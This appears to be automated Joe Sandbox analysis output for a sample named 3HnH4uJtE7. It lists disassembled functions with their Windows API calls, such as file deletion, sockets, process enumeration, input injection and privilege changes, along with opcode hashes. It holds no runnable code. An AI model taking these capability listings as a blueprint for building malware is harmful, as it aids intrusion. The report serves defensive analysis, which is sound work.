                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0094D420
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D470
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D481
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D498
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D4A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                    • Instruction ID: 50434544baeb9c51cf99fe93bc52002787ac491f0ae9e212c3912401189d3442
                                                                    • Opcode Fuzzy Hash: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                    • Instruction Fuzzy Hash: 68316F7101D3819BC204EF69D8958AF77ACFE92304F444A2DF4E5931A1EB20EA49D763
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                    • Instruction ID: 27b16bb383390d24e718a71fc6f18111578f19e1709c111dc521114cffeca59a
                                                                    • Opcode Fuzzy Hash: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                    • Instruction Fuzzy Hash: 7EC22C71E0862D8FDB25CE289D547E9B7B9EB44344F1445EAD84EE7280E778AEC18F40
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 009564DC
                                                                    • CoInitialize.OLE32(00000000), ref: 00956639
                                                                    • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 00956650
                                                                    • CoUninitialize.OLE32 ref: 009568D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: c4427b0a7a6cbe937103486bf015279f9621bc1abeb09b8120e4344350ce6fad
                                                                    • Instruction ID: 397ed81502e97f2b979c4233448752e423a5a47b29b6bc724da891ca3d410133
                                                                    • Opcode Fuzzy Hash: c4427b0a7a6cbe937103486bf015279f9621bc1abeb09b8120e4344350ce6fad
                                                                    • Instruction Fuzzy Hash: 1FD159715082419FC314EF29C881A6BB7E8FF95704F50496DF595CB2A1EB70EE0ACB92
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 009622E8
                                                                      • Part of subcall function 0095E4EC: GetWindowRect.USER32(?,?), ref: 0095E504
                                                                    • GetDesktopWindow.USER32 ref: 00962312
                                                                    • GetWindowRect.USER32(00000000), ref: 00962319
                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00962355
                                                                    • GetCursorPos.USER32(?), ref: 00962381
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009623DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                    • String ID:
                                                                    • API String ID: 2387181109-0
                                                                    • Opcode ID: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                    • Instruction ID: 9771fcf244d5be404067d9ed49e834b52b4d78e5005956b0d14617662f77cf31
                                                                    • Opcode Fuzzy Hash: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                    • Instruction Fuzzy Hash: 1E31EE72509715AFC720DF54C849F9BBBA9FF88710F000A1DF98997291DB35EA48CB92
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00959B78
                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00959C8B
                                                                      • Part of subcall function 00953874: GetInputState.USER32 ref: 009538CB
                                                                      • Part of subcall function 00953874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00959BA8
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00959C75
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 1972594611-438819550
                                                                    • Opcode ID: 4148e0e43a8646cfdffd3de0c734c953552749abd19844ad665983cfa6681f38
                                                                    • Instruction ID: da41799bfb3761c644eb4cc00647eccc42db7be7fe6a5127264690f42e931ae1
                                                                    • Opcode Fuzzy Hash: 4148e0e43a8646cfdffd3de0c734c953552749abd19844ad665983cfa6681f38
                                                                    • Instruction Fuzzy Hash: D5416171904209EFDF14DF69D845AEE7BB8FF45311F244055E859A2191EB309E88CF61
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 008F9A4E
                                                                    • GetSysColor.USER32(0000000F), ref: 008F9B23
                                                                    • SetBkColor.GDI32(?,00000000), ref: 008F9B36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$LongProcWindow
                                                                    • String ID:
                                                                    • API String ID: 3131106179-0
                                                                    • Opcode ID: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                    • Instruction ID: 185dcce16e73c945b18d357ce0ed348f1656c8f42806b889ff3ae6678cf2ad94
                                                                    • Opcode Fuzzy Hash: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                    • Instruction Fuzzy Hash: CDA17EB120846CBEE738AA7C8C99F7B769DFB82314F10420AF692C65D1CA259D01D772
                                                                    APIs
                                                                      • Part of subcall function 0096304E: inet_addr.WSOCK32(?), ref: 0096307A
                                                                      • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0096185D
                                                                    • WSAGetLastError.WSOCK32 ref: 00961884
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009618DB
                                                                    • WSAGetLastError.WSOCK32 ref: 009618E6
                                                                    • closesocket.WSOCK32(00000000), ref: 00961915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 1601658205-0
                                                                    • Opcode ID: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                    • Instruction ID: d576f579b0559731347e49a84c047e6a268ca066fcebb58b433076656211d455
                                                                    • Opcode Fuzzy Hash: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                    • Instruction Fuzzy Hash: 7351B471A002109FD710AF28D886F6A77E5EB45718F08845CF9159F3D3D771AD418BA2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                    • Instruction ID: 1099ca8f3b023b9deb96a187eb01e3907d5c33e0b4197ea5089b15127acedff7
                                                                    • Opcode Fuzzy Hash: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                    • Instruction Fuzzy Hash: 3121A0327402015FD7218F5EC884B2A7BA9EF85314B1DC05CE88E8B251CB71EC42CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-1546025612
                                                                    • Opcode ID: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                    • Instruction ID: d19d6072b94765976761d67efeb42b7dd0171dfa60d026fcc80dc0e985ab7338
                                                                    • Opcode Fuzzy Hash: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                    • Instruction Fuzzy Hash: 92A28E70A0066ACBDF24CF59D8407ADB7B1FF55314F2585AAE819E7688EB309D81CF90
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0096A6AC
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0096A6BA
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0096A79C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096A7AB
                                                                      • Part of subcall function 008FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00923303,?), ref: 008FCE8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1991900642-0
                                                                    • Opcode ID: e49e90a7b58cece87eb2bb23f325d1e3491d1f70aca057444fd068feb6aec0de
                                                                    • Instruction ID: 7562f496b1162d0873a415d915f774c36f8a2cfa4a8a05c91eb3de89ba27c70a
                                                                    • Opcode Fuzzy Hash: e49e90a7b58cece87eb2bb23f325d1e3491d1f70aca057444fd068feb6aec0de
                                                                    • Instruction Fuzzy Hash: 06514C715083409FD710EF29C886A6BBBE8FF89754F40492DF595D7262EB70E904CB92
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0094AAAC
                                                                    • SetKeyboardState.USER32(00000080), ref: 0094AAC8
                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0094AB36
                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0094AB88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                    • Instruction ID: 66d935ca39955cef175ce32ef6234f70da8a01855a0be217a1438870dafeb9cf
                                                                    • Opcode Fuzzy Hash: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                    • Instruction Fuzzy Hash: 0F312470AC0208AEFF35CB65CC05FFA7BAAEB94320F04421BF585961D0D3798981D7A2
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0091BB7F
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • GetTimeZoneInformation.KERNEL32 ref: 0091BB91
                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC09
                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,009B1270,000000FF,?,0000003F,?,?,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC36
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                    • String ID:
                                                                    • API String ID: 806657224-0
                                                                    APIs
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0095CE89
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0095CEEA
                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0095CEFE
                                                                    Similarity
                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                    • String ID:
                                                                    • API String ID: 234945975-0
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009482AA
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00955CC1
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00955D17
                                                                    • FindClose.KERNEL32(?), ref: 00955D5F
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0091271A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00912724
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00912731
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009551DA
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00955238
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 009552A1
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    APIs
                                                                      • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                      • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                    • GetLastError.KERNEL32 ref: 0094174A
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                    • String ID:
                                                                    • API String ID: 577356006-0
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D608
                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0094D645
                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D650
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                    • String ID:
                                                                    • API String ID: 33631002-0
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0094168C
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009416A1
                                                                    • FreeSid.ADVAPI32(?), ref: 009416B1
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D09
                                                                    • TerminateProcess.KERNEL32(00000000,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D10
                                                                    • ExitProcess.KERNEL32 ref: 00904D22
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0093D28C
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID: X64
                                                                    • API String ID: 2645101109-893830106
                                                                    • Opcode ID: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                    • Instruction ID: 79cc3311d5f3a09fac9056f64bb0d45baca58a8e577c2e027caabdae969518d9
                                                                    • Opcode Fuzzy Hash: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                    • Instruction Fuzzy Hash: CFD0C9B581511DEADF90CBA0EC88DDAB37CBB04305F100555F606E2000DB3495489F10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                    • Instruction ID: b29bbdd2880a89e796e68f97d0dea015bfe5a1e7f15416a296dd096aa3fcbf3f
                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                    • Instruction Fuzzy Hash: F5021DB1E001299FDF14CFA9C8806ADBBF5EF88314F25466AE919E7384D731AD418B94
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00956918
                                                                    • FindClose.KERNEL32(00000000), ref: 00956961
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                    • Instruction ID: 658f2487575da50b5330faaba0e445999e7c20eb9550d4ad5e945a204c442296
                                                                    • Opcode Fuzzy Hash: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                    • Instruction Fuzzy Hash: 0611D0716042009FC710CF2AD484A16BBE4FF85329F44C69DE8698F2A2CB30EC45CB91
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537E4
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
